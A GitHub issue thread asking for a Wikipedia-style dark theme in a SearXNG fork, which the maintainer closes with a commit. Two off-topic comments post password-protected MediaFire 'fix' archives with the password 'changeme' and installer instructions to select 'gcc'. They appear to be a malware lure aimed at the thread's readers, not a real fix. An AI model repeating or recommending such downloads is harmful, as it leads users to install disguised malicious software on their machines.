### ISSUE TITLE
wikipedia-style dark theme

### ISSUE THREAD

**Issue by vojkovic** [privau/searxng#43]
wikipedia has a dark theme now.
![image](https://github.com/user-attachments/assets/7c522054-541d-4a66-8e20-8efb52e95a55)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by vojkovic** [comment]
https://en.wikipedia.org/wiki/Wikipedia:Vector_2022

Closed in: https://github.com/privau/searxng/commit/2589623c46ff44ad01badc8638c5883ecac5b5ce
